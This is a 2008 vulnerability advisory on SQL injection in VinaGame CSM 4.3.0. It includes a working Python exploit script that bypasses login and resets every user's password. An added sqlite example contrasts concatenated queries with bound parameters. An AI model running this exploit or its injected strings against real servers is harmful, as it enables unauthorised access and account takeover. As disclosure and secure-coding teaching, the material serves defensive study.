| Title: | SQL injection in VinaGame CSM |
|---|---|
| Severity: | Critical |
| Reporter: | Blue Moon Consulting |
| Products: | VinaGame CSM 4.3.0 |
| Fixed in: | -- |

An SQL injection vulnerability found in VinaGame CSM 4.3.0 allows a rogue client to manipulate SQL commands being run at the CSM server.
A vulnerability in the CSM server allows an attacker to inject SQL strings into the SQL commands the server builds. An attacker is able to bypass client authentication and reset the passwords of all users on the system.
There is no workaround at the moment. Users are advised to contact the vendor directly for a proper fix.
The vendor has not released a patch yet.
Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.

| Initial vendor contact: | April 26, 2008: request for communication sent to csm@vinagame.com.vn |
|---|---|
| Vendor response: | -- |
| Public disclosure: | May 03, 2008 |

Exploit code:

```python
import socket
import struct
import threading
import time

SERVER_IP = 'YOU_HAVE_TO_CHANGE_THIS'
CLIENT_IP = '192.168.1.10'
NEW_PASSWORD = 'abc'

def send_command(s, cmd, content):
    buf = struct.pack("II", cmd, 0)
    buf += content
    buf += (208 - len(buf)) * '\x00'
    s.send(buf)

def recv(s):
    buf = s.recv(208)
    while len(buf) > 0:
        print len(buf), hex(ord(buf[0]))
        buf = s.recv(208)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((SERVER_IP, 1212))
send_command(s, 0x33, "PoC;%s;4.2.5" % CLIENT_IP)
send_command(s, 0x37, "PoC;0;14")
send_command(s, 0x4C, "20480")
send_command(s, 0x34, "0;14")
kicker = threading.Thread(target=recv, args=(s,))
kicker.setDaemon(True)
kicker.start()
for i in range(5):
    send_command(s, 0x96, "")
    time.sleep(2)
send_command(s, 0x36, "PoC;') OR remaintime > 0 and ('1'='1")
time.sleep(5)
send_command(s, 0x40, "208634")
send_command(s, 0x41, "22631")
send_command(s, 0x35, "1;30;PoC")
for i in range(5):
    buf = '\x96' + 207 * '\x00'
    s.send(buf)
    time.sleep(2)
send_command(s, 0x38, "PoC;') OR ('1'='1;%s" % NEW_PASSWORD)
for i in range(5):
    send_command(s, 0x96, "")
    time.sleep(2)
s.close()
```

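The following added example (not part of the original advisory and not the vendor's code) shows why the two injected fields above change the meaning of a concatenated statement, and how bound parameters keep them inert. The `users` table, the query shapes and the function names are assumptions; only the injected strings and the `remaintime` column name come from the advisory.

```python
import sqlite3

# Injected field values quoted from the advisory's exploit code.
LOGIN_FIELD = "') OR remaintime > 0 and ('1'='1"
RESET_FIELD = "') OR ('1'='1"

def make_db():
    # Constructed schema and rows; the real CSM tables are not published.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, remaintime INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "a-secret", 120), ("bob", "b-secret", 0)])
    return db

def find_user_concat(db, username):
    # Vulnerable pattern: client text is pasted into the statement (assumed shape).
    sql = "SELECT username FROM users WHERE (username = '%s')" % username
    return [row[0] for row in db.execute(sql)]

def find_user_bound(db, username):
    # Hardened: the placeholder keeps client text as a value, never as SQL.
    sql = "SELECT username FROM users WHERE (username = ?)"
    return [row[0] for row in db.execute(sql, (username,))]

def set_password_concat(db, username, new_password):
    # Same vulnerable pattern applied to an UPDATE (assumed shape).
    sql = "UPDATE users SET password = '%s' WHERE (username = '%s')" % (new_password, username)
    return db.execute(sql).rowcount  # number of rows changed

def set_password_bound(db, username, new_password):
    sql = "UPDATE users SET password = ? WHERE (username = ?)"
    return db.execute(sql, (new_password, username)).rowcount

def passwords(db):
    return dict(db.execute("SELECT username, password FROM users"))

if __name__ == "__main__":
    db = make_db()
    print("concat lookup:", find_user_concat(db, LOGIN_FIELD))
    print("bound lookup: ", find_user_bound(db, LOGIN_FIELD))
    print("bound update rows: ", set_password_bound(db, RESET_FIELD, "abc"))
    print("concat update rows:", set_password_concat(db, RESET_FIELD, "abc"))
    print(passwords(db))
```

With concatenation the `WHERE` clause becomes `(username = '') OR ('1'='1')`, so it matches every row; with bound parameters the same text is compared as a literal username and matches none.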
The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.